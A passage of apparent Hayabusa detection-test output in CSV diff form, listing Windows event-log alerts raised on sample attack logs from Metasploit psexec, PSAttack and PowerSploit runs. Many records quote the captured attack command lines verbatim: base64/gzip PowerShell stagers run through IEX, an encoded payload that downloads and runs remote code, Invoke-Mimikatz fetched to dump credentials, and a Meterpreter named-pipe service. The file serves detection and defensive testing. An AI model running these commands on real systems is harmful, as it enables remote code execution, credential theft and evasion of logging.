IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAGFl4VcCA71WW4/aOhB+bqX+h6hCIlFZEli6N6nScYAAy2Vhw52iI5M4weDEbOJw6+l/PxMge2m31Z4+nAgU2zPjGX/zjSdO5FuCcl+aF8YW77iE9KRvH96/a+MAe5Kcmq0rV5uutY5mopKRUq6rcU625Yd6V3n3DvRS++uRJ32R5AlarUrcw9Sf3twUoyAgvjjOsxUiUBgSb8YoCWVF+kcazElAzu5mC2IJ6ZuU+jtbYXyG2UltV8TWnEhnyLdjWYNbOI4xa64YFXL669e0MjnLTbPlhwizUE6bu1AQL2szllak70rssLtbETndpFbAQ+6I7ID65/lszw+xQ1qw25o0iZhzO0wrcAr4BUREgS8dzhNvcBTLaRi2A24h2w5ICNrZmr/mSyKn/IixjPSXPDl5v498QT0CckECvjJJsKYWCbNV7NuM3BNnKrfIJjn0W43k50ag1RaBkoG8vBJmk9sRI0fLtPJzoC9yqcDzQz4BiO8f3n947ySU8C6CVWtPLxcbhJ+TAkbvJocxgajlNg/pQf+LpGWkJvjHggc7mKa6QUSUqTSJszGZTqWUPeyagdjVM7/eI5cYgPreEMM1h8VJn1N7CkanbKUs9hB7+A3rSsShPintfOxRKyGW/FoOiMPI4cTZRK0FYcnpk4DYJcKIi0WMakaa/GxW9qh4tNUjymwSIAvyGEJUkGLlZTDHRMnpmt8kHiB1nKchHQ7QmSTaJwrvEu/xHJTSRYbDMCO1I6gnKyOZBDNiZyTkh/QkQpHgh2H6KdxmxAS1cCiS7aZKguPJX5H7oQgiC5IHZ++aK2JRzGIoMlKV2kTfmdRN/KZfBaKIGaO+CzutIRGwEgNgipgSAYT4mH4laxJR81aMeKB3KG6DYRdK+VQQBx5hl9jpH6NMCH9kd4xHAsSzGCHJJuMiI/VpIOCOiLE9cunPg3h2RxzCKQbklBQ5qZyJvhMxz1MMF+dHfp4wOiASCEDDCLin45BcFEwRAFbyR/WOFhE8o5rPmpa+pDm0oblaE/49el7jpUu7fruoqkFpO3dQLaw1q+1Sp1otrG/NfkGY5Zqot2uiWR4uFiaq3vdGYlxD1S7VlqPCfnVL92YD2aOterHX9xtN3+4Xru2MSo7jXjrmfe6zQRuDYkfX8rhRKkeNgb7RtUJYpptqh/Y6y1tDzEZ9hnuO6g5z15huG8Gin+PNfQ2hyvzc2t86/cq8ae9GVfV6UFiiMkJFv9w3dF4f6QFqq33s9vmmvqiwgVtEumFRMu70DL3TMXTUqyweSteqC7ZDPNcH/Twdr4b3c5gbEEJd1Qo1m+z5qAMgVTjC7j3ouMW8NXdAp/QJ6Z9aPMzjpc6RDjrG+AHiGq2MNgN5t5fnqM9aQ4wa452hqrlRu4CqGh1UXBRviV29g1G4Lu1Laq5vc3vwuTVy1P6QXaqlYndlOaqqbqqlujXOba/uLgu69lD0qMdmeVu97l3p/qbutteu3Rlc3m9buxn466lq/2PMGqBNavHZu9IuF8/o8Ktrv4mDcI4Z0ATu86RQDR4Ypyu5zWlsIcvPuvWSBD5h0Nyg/SV8R4xxK+4TL65w6FXHDjKF4u3B8Dz/6kiRHhWVpz6SLN3cjCFmqKMjybMN4rtintG255oG97+2LWhw8LeftMhXO/m0WSbuIAleTy7YwYUSl1hqMdg0L5bV1f+B5qnE5/Cy34rm09pvpG9CWMs8IvGT5OXCf8L7D7EYYCpA34Qri5FjA/09JCcuPfsQSVIHXHFOT/wxeBeJsxZ8o/wLs66tlosKAAA=''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0xb2c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx
+2016-09-21 01:35:46.608 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAGFl4VcCA71WW4/aOhB+bqX+h6hCIlFZEli6N6nScYAAy2Vhw52iI5M4weDEbOJw6+l/PxMge2m31Z4+nAgU2zPjGX/zjSdO5FuCcl+aF8YW77iE9KRvH96/a+MAe5Kcmq0rV5uutY5mopKRUq6rcU625Yd6V3n3DvRS++uRJ32R5AlarUrcw9Sf3twUoyAgvjjOsxUiUBgSb8YoCWVF+kcazElAzu5mC2IJ6ZuU+jtbYXyG2UltV8TWnEhnyLdjWYNbOI4xa64YFXL669e0MjnLTbPlhwizUE6bu1AQL2szllak70rssLtbETndpFbAQ+6I7ID65/lszw+xQ1qw25o0iZhzO0wrcAr4BUREgS8dzhNvcBTLaRi2A24h2w5ICNrZmr/mSyKn/IixjPSXPDl5v498QT0CckECvjJJsKYWCbNV7NuM3BNnKrfIJjn0W43k50ag1RaBkoG8vBJmk9sRI0fLtPJzoC9yqcDzQz4BiO8f3n947ySU8C6CVWtPLxcbhJ+TAkbvJocxgajlNg/pQf+LpGWkJvjHggc7mKa6QUSUqTSJszGZTqWUPeyagdjVM7/eI5cYgPreEMM1h8VJn1N7CkanbKUs9hB7+A3rSsShPintfOxRKyGW/FoOiMPI4cTZRK0FYcnpk4DYJcKIi0WMakaa/GxW9qh4tNUjymwSIAvyGEJUkGLlZTDHRMnpmt8kHiB1nKchHQ7QmSTaJwrvEu/xHJTSRYbDMCO1I6gnKyOZBDNiZyTkh/QkQpHgh2H6KdxmxAS1cCiS7aZKguPJX5H7oQgiC5IHZ++aK2JRzGIoMlKV2kTfmdRN/KZfBaKIGaO+CzutIRGwEgNgipgSAYT4mH4laxJR81aMeKB3KG6DYRdK+VQQBx5hl9jpH6NMCH9kd4xHAsSzGCHJJuMiI/VpIOCOiLE9cunPg3h2RxzCKQbklBQ5qZyJvhMxz1MMF+dHfp4wOiASCEDDCLin45BcFEwRAFbyR/WOFhE8o5rPmpa+pDm0oblaE/49el7jpUu7fruoqkFpO3dQLaw1q+1Sp1otrG/NfkGY5Zqot2uiWR4uFiaq3vdGYlxD1S7VlqPCfnVL92YD2aOterHX9xtN3+4Xru2MSo7jXjrmfe6zQRuDYkfX8rhRKkeNgb7RtUJYpptqh/Y6y1tDzEZ9hnuO6g5z15huG8Gin+PNfQ2hyvzc2t86/cq8ae9GVfV6UFiiMkJFv9w3dF4f6QFqq33s9vmmvqiwgVtEumFRMu70DL3TMXTUqyweSteqC7ZDPNcH/Twdr4b3c5gbEEJd1Qo1m+z5qAMgVTjC7j3ouMW8NXdAp/QJ6Z9aPMzjpc6RDjrG+AHiGq2MNgN5t5fnqM9aQ4wa452hqrlRu4CqGh1UXBRviV29g1G4Lu1Laq5vc3vwuTVy1P6QXaqlYndlOaqqbqqlujXOba/uLgu69lD0qMdmeVu97l3p/qbutteu3Rlc3m9buxn466lq/2PMGqBNavHZu9IuF8/o8Ktrv4mDcI4Z0ATu86RQDR4Ypyu5zWlsIcvPuvWSBD5h0Nyg/SV8R4xxK+4TL65w6FXHDjKF4u3B8Dz/6kiRHhWVpz6SLN3cjCFmqKMjybMN4rtintG255oG97+2LWhw8LeftMhXO/m0WSbuIAleTy7YwYUSl1hqMdg0L5bV1f+B5qnE5/Cy34rm09pvpG9CWMs8IvGT5OXCf8L7D7EYYCpA34Qri5FjA/09JCcuPfsQSVIHXHFOT/wxeBeJsxZ8o/wLs66tlosKAAA=''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x104 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx
+2016-09-21 01:35:46.790 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAGFl4VcCA71WW4/aOhB+bqX+h6hCIlFZEli6N6nScYAAy2Vhw52iI5M4weDEbOJw6+l/PxMge2m31Z4+nAgU2zPjGX/zjSdO5FuCcl+aF8YW77iE9KRvH96/a+MAe5Kcmq0rV5uutY5mopKRUq6rcU625Yd6V3n3DvRS++uRJ32R5AlarUrcw9Sf3twUoyAgvjjOsxUiUBgSb8YoCWVF+kcazElAzu5mC2IJ6ZuU+jtbYXyG2UltV8TWnEhnyLdjWYNbOI4xa64YFXL669e0MjnLTbPlhwizUE6bu1AQL2szllak70rssLtbETndpFbAQ+6I7ID65/lszw+xQ1qw25o0iZhzO0wrcAr4BUREgS8dzhNvcBTLaRi2A24h2w5ICNrZmr/mSyKn/IixjPSXPDl5v498QT0CckECvjJJsKYWCbNV7NuM3BNnKrfIJjn0W43k50ag1RaBkoG8vBJmk9sRI0fLtPJzoC9yqcDzQz4BiO8f3n947ySU8C6CVWtPLxcbhJ+TAkbvJocxgajlNg/pQf+LpGWkJvjHggc7mKa6QUSUqTSJszGZTqWUPeyagdjVM7/eI5cYgPreEMM1h8VJn1N7CkanbKUs9hB7+A3rSsShPintfOxRKyGW/FoOiMPI4cTZRK0FYcnpk4DYJcKIi0WMakaa/GxW9qh4tNUjymwSIAvyGEJUkGLlZTDHRMnpmt8kHiB1nKchHQ7QmSTaJwrvEu/xHJTSRYbDMCO1I6gnKyOZBDNiZyTkh/QkQpHgh2H6KdxmxAS1cCiS7aZKguPJX5H7oQgiC5IHZ++aK2JRzGIoMlKV2kTfmdRN/KZfBaKIGaO+CzutIRGwEgNgipgSAYT4mH4laxJR81aMeKB3KG6DYRdK+VQQBx5hl9jpH6NMCH9kd4xHAsSzGCHJJuMiI/VpIOCOiLE9cunPg3h2RxzCKQbklBQ5qZyJvhMxz1MMF+dHfp4wOiASCEDDCLin45BcFEwRAFbyR/WOFhE8o5rPmpa+pDm0oblaE/49el7jpUu7fruoqkFpO3dQLaw1q+1Sp1otrG/NfkGY5Zqot2uiWR4uFiaq3vdGYlxD1S7VlqPCfnVL92YD2aOterHX9xtN3+4Xru2MSo7jXjrmfe6zQRuDYkfX8rhRKkeNgb7RtUJYpptqh/Y6y1tDzEZ9hnuO6g5z15huG8Gin+PNfQ2hyvzc2t86/cq8ae9GVfV6UFiiMkJFv9w3dF4f6QFqq33s9vmmvqiwgVtEumFRMu70DL3TMXTUqyweSteqC7ZDPNcH/Twdr4b3c5gbEEJd1Qo1m+z5qAMgVTjC7j3ouMW8NXdAp/QJ6Z9aPMzjpc6RDjrG+AHiGq2MNgN5t5fnqM9aQ4wa452hqrlRu4CqGh1UXBRviV29g1G4Lu1Laq5vc3vwuTVy1P6QXaqlYndlOaqqbqqlujXOba/uLgu69lD0qMdmeVu97l3p/qbutteu3Rlc3m9buxn466lq/2PMGqBNavHZu9IuF8/o8Ktrv4mDcI4Z0ATu86RQDR4Ypyu5zWlsIcvPuvWSBD5h0Nyg/SV8R4xxK+4TL65w6FXHDjKF4u3B8Dz/6kiRHhWVpz6SLN3cjCFmqKMjybMN4rtintG255oG97+2LWhw8LeftMhXO/m0WSbuIAleTy7YwYUSl1hqMdg0L5bV1f+B5qnE5/Cy34rm09pvpG9CWMs8IvGT5OXCf8L7D7EYYCpA34Qri5FjA/09JCcuPfsQSVIHXHFOT/wxeBeJsxZ8o/wLs66tlosKAAA='));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x5fc | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx
+2016-09-21 01:35:58.162 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,Svc: genusn | Path: cmd.exe /c echo genusn > \\.\pipe\genusn | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx
+2016-09-21 01:35:58.162 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: genusn | Path: cmd.exe /c echo genusn > \\.\pipe\genusn,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx
+2016-09-21 01:35:58.162 +09:00,IE10Win7,7045,info,,New Service Installed,Name: genusn | Path: cmd.exe /c echo genusn > \\.\pipe\genusn | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx
+2016-09-21 01:35:58.169 +09:00,IE10Win7,4688,medium,,Suspicious Cmd Line_Possible Meterpreter getsystem,Cmd Line: cmd.exe /c echo genusn > \\.\pipe\genusn | Path: C:\Windows\System32\cmd.exe | PID: 0xe8c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleMeterpreterGetSystem.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx
+2016-09-21 01:35:58.169 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /c echo genusn > \\.\pipe\genusn | Path: C:\Windows\System32\cmd.exe | PID: 0xe8c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx
+2016-09-21 03:27:25.424 +09:00,IE10Win7,1102,high,Evas,Security Log Cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx
+2016-09-21 03:27:39.918 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdec | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx
+2016-09-21 03:27:42.755 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x620 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx
+2016-09-21 03:27:42.802 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3bc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx
+2016-09-21 03:27:44.943 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\g4g34pot.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xc58 | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx
+2016-09-21 03:28:55.689 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x234 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx
+2016-09-21 03:28:55.705 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x924 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx
+2016-09-21 03:28:58.267 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\wlqywrdm.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0x71c | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx
+2016-09-21 03:33:13.923 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\0xqpayvt.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0x920 | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx
+2016-09-21 03:41:27.017 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\kwos13rh.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0x760 | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx
+2016-09-21 03:45:16.455 +09:00,IE10Win7,1102,high,Evas,Security Log Cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx
+2016-09-21 03:45:24.408 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9a0 | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx
+2016-09-21 03:45:24.408 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx
+2016-09-21 03:45:48.501 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('http://eic.me/17'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x700 | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx
+2016-09-21 03:45:48.501 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx
+2016-09-21 04:15:32.581 +09:00,IE10Win7,1102,high,Evas,Security Log Cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx
+2016-09-21 04:15:49.846 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe80 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx
+2016-09-21 04:15:53.753 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x620 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx
+2016-09-21 04:15:53.785 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xea8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx
+2016-09-21 04:15:53.847 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\launcher.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x200 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx
+2016-09-21 04:15:54.128 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: powershell.exe -NoP -sta -NonI -W Hidden -Enc WwBTAFkAUwB0AEUAbQAuAE4ARQBUAC4AUwBFAHIAdgBJAEMAZQBQAG8AaQBOAFQATQBBAE4AYQBHAEUAcgBdADoAOgBFAFgAUABlAEMAVAAxADAAMABDAG8AbgBUAGkAbgB1AEUAIAA9ACAAMAA7ACQAVwBjAD0ATgBlAHcALQBPAGIASgBlAGMAVAAgAFMAWQBTAHQAZQBNAC4ATgBFAFQALgBXAGUAQgBDAGwAaQBFAE4AVAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHcAYwAuAEgARQBBAEQAZQBSAHMALgBBAGQARAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAFcAQwAuAFAAcgBPAHgAeQAgAD0AIABbAFMAeQBzAFQAZQBtAC4ATgBlAFQALgBXAEUAQgBSAGUAcQB1AEUAUwB0AF0AOgA6AEQAZQBmAGEAdQBMAFQAVwBlAEIAUABSAG8AeAB5ADsAJABXAGMALgBQAFIATwB4AFkALgBDAFIARQBEAGUATgBUAEkAYQBMAHMAIAA9ACAAWwBTAFkAcwBUAEUAbQAuAE4AZQB0AC4AQwByAGUARABlAG4AdABJAEEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQBVAEwAVABOAGUAVAB3AG8AcgBrAEMAcgBFAEQAZQBuAFQASQBhAEwAcwA7ACQASwA9ACcAcwB5AHwAUgA0AFgAaABCAFcAbwB6AEsALgB4AC0ANgArADkAPgBJAGkAcQA3AEQAOABgAEoATABuAGwAdwBWACcAOwAkAEkAPQAwADsAWwBDAEgAYQBSAFsAXQBdACQAQgA9ACgAWwBDAGgAQQBSAFsAXQBdACgAJAB3AGMALgBEAE8AdwBuAGwAbwBhAEQAUwBUAHIASQBOAEcAKAAiAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEAOQA4AC4AMQA0ADkAOgA4ADAAOAAwAC8AaQBuAGQAZQB4AC4AYQBzAHAAIgApACkAKQB8ACUAewAkAF8ALQBCAFgATwBSACQAawBbACQAaQArACsAJQAkAGsALgBMAGUAbgBnAHQAaABdAH0AOwBJAEUAWAAgACgAJABCAC0ASgBPAEkATgAnACcAKQA= | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe68 | User: IEUser | LID: 0x6793c,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx
+2016-09-21 04:15:54.128 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: cmd /c del ""C:\Users\IEUser\Desktop\launcher.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x480 | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx
+2016-09-21 04:19:22.128 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf9c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx
+2016-09-21 04:19:26.543 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x990 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx
+2016-09-21 04:19:26.575 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x160 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx
